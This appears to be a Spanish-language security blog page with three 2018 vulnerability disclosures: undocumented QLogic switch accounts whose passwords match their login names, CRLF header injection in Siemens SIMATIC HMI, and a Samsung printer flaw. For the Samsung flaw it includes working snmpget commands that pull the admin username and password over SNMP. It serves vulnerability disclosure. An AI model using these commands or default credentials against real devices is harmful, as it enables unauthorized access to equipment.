martes, 9 de octubre de 2018

[Qlogic] 4G & 4/8G Fibre Channel Switch Module for IBM BladeCenter (CVE-2018-18202 )

Users (prom, diags and support) are not documented in the Qlogic 4/8G documentation, and those users  have the same login name as password


Affected System:  

  • QLogic(R) 4Gb Fibre Channel Switch Module for IBM BladeCenter(R)
  • QLogic(R) 20-Port 4/8 Gb SAN Switch Module for IBM BladeCenter(R)

jueves, 4 de octubre de 2018

[Siemens] SIMATIC HMI; "HTTP Header Injection" via CRLF ( CVE-2018-13814 )

 "HTTP Header Injection", via CRLF (Salto de linea y retorno de carro ) en equipos "SIMANTIC HMI" de la firma Siemens.

miércoles, 3 de octubre de 2018

#Samsung #printer #passwordLeak ( CVE-2018-17969 )


Problemas con el acceso ?



No problema!
Passwords leaks, via SNMP !

Poc 


USUARIO:
$ snmpget -v 1 -c public 192.168.0.22 iso.3.6.1.4.1.236.11.5.11.81.10.1.5.0
> iso.3.6.1.4.1.236.11.5.11.81.10.1.5.0 = STRING: "admin"

PASSWORD:
$ snmpget -v 1 -c public 192.168.0.22 iso.3.6.1.4.1.236.11.5.11.81.10.1.6.0
> iso.3.6.1.4.1.236.11.5.11.81.10.1.6.0 = STRING: "1111"




Challenge success !!!





Saludos,
@capitan_alfa